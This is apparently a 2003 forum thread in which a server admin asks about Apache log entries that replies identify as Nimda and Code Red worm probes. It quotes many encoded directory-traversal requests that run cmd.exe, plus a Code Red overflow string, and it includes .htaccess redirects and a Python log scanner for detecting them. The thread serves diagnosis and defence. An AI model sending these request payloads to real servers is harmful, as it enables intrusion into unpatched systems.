Apache Log, what does this mean?


mazeroth
02-26-2003, 01:48 AM
What do these mean? My apache error logs are filled with these and I don't know what they are.


[Tue Feb 25 12:40:55 2003] [error] [client ##.##.##.##] unable to include potential exec "include/top.html" in parsed file /var/www/error/HTTP_NOT_FOUND.html.var

[Tue Feb 25 12:40:55 2003] [error] [client ##.##.##.##] unable to include potential exec "include/bottom.html" in parsed file /var/www/error/HTTP_NOT_FOUND.html.var


And my access log has very weird stuff like this... My guess is someone is trying to break in...

66.20.89.147 - - [16/Feb/2003:10:30:37 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:38 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:39 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:39 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 193 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:39 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 193 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:39 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
66.20.89.147 - - [16/Feb/2003:10:30:39 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"



What do you guys think? The only services enabled in my server are ssh and httpd. I guess I would need to learn more about iptables to block people if they are trying to break in through an enabled service? Or use portsentry? Thanks.

endoalpha
02-26-2003, 02:16 AM
check here: http://www.cert.org/advisories/CA-2001-26.html

It is the Nimda or Code Red worm. It does not affect Apache. Only Microsoft IIS 4.0/5.0 servers... go figure

TheMatr1x
02-27-2003, 11:06 AM
Heh, if that keeps happening, get the dirs it's trying to search, and make some files called that and make them block the computer that's doing that or screw it up or something

ixthus
02-27-2003, 08:53 PM
Originally posted by mazeroth
What do these mean? My apache error logs are filled with these and I don't know what they are.


here is an older thread on this (http://justlinux.com/forum/showthread.php?s=&threadid=80639)

Judi C.
03-02-2003, 04:36 PM
If you add these lines to your .htaccess it will stop all the 404 page-not-found errors.


redirect /scripts http://www.virus_be_gone.antivirus
redirect /scripts/..%255c%255c../winnt http://www.virus_be_gone.antivirus
redirect /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir http://www.virus_be_gone.antivirus
redirect /scripts/..%c0%af../winnt/system32/ http://www.virus_be_gone.antivirus
redirect /scripts/..%c1%9c../winnt/system32/ http://www.virus_be_gone.antivirus
redirect /MSADC http://www.virus_be_gone.antivirus
redirect /c http://www.virus_be_gone.antivirus
redirect /d http://www.virus_be_gone.antivirus
redirect /_mem_bin http://www.virus_be_gone.antivirus
redirect /msadc http://www.virus_be_gone.antivirus
redirect /w3c http://www.virus_be_gone.antivirus
redirect /_vti_bin/shtml.exe http://www.virus_be_gone.antivirus

Those log entries you posted are the Nimda virus.
Code Red will log like this:
210.96.137.172 - - [18/Oct/2002:16:47:17 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
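As an added example (not from anyone in this thread): a small Python script that parses Apache combined-format access log lines like the ones posted above, undoes the nested percent-encoding (%255c and friends) that the Nimda probes use to hide the traversal, and tallies Nimda-style cmd.exe/root.exe probes and Code Red default.ida requests per source IP. The sample log is constructed with documentation IP ranges; the timestamps are made up.

```python
import re
from urllib.parse import unquote

# Constructed sample in Apache combined log format, modelled on the Nimda and
# Code Red entries quoted in the thread. IPs (RFC 5737) and times are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Feb/2003:10:30:38 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
192.0.2.10 - - [16/Feb/2003:10:30:38 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
192.0.2.10 - - [16/Feb/2003:10:30:39 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 250 "-" "-"
198.51.100.7 - - [18/Oct/2002:16:47:17 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3 HTTP/1.0" 404 250 "-" "-"
203.0.113.5 - - [16/Feb/2003:10:31:00 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
CODERED_RE = re.compile(r'^/default\.ida\?n{10,}')  # long run of N padding

def normalize_path(path):
    """Undo nested percent-encoding (%255c -> %5c -> backslash) so the obfuscated
    traversal variants compare as plain text; invalid UTF-8 like %c0%af is replaced."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.lower()

def classify(path):
    """Return 'CodeRed', 'Nimda' or None for one request path."""
    norm = normalize_path(path)
    if CODERED_RE.match(norm):
        return 'CodeRed'
    if ('cmd.exe' in norm or 'root.exe' in norm) and '/c+dir' in norm:
        return 'Nimda'
    return None

def scan(log_text):
    """Tally worm probes per source IP as {ip: {family: count}}."""
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        family = classify(m['path'])
        if family:
            per_ip = hits.setdefault(m['ip'], {})
            per_ip[family] = per_ip.get(family, 0) + 1
    return hits
```

Running `scan(SAMPLE_LOG)` on the constructed sample reports three Nimda probes from the first IP and one Code Red hit from the second, and ignores the normal request; point it at a real access log to see which hosts are just worm noise before deciding what to block.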

ixthus
03-02-2003, 05:41 PM
Originally posted by Judi C.
If you add these lines to your htaccess it will stop all the 404 page not found. . . . . .


Thank you, I'll give it a try.....I hate giving up resources for those that don't appreciate them :mad: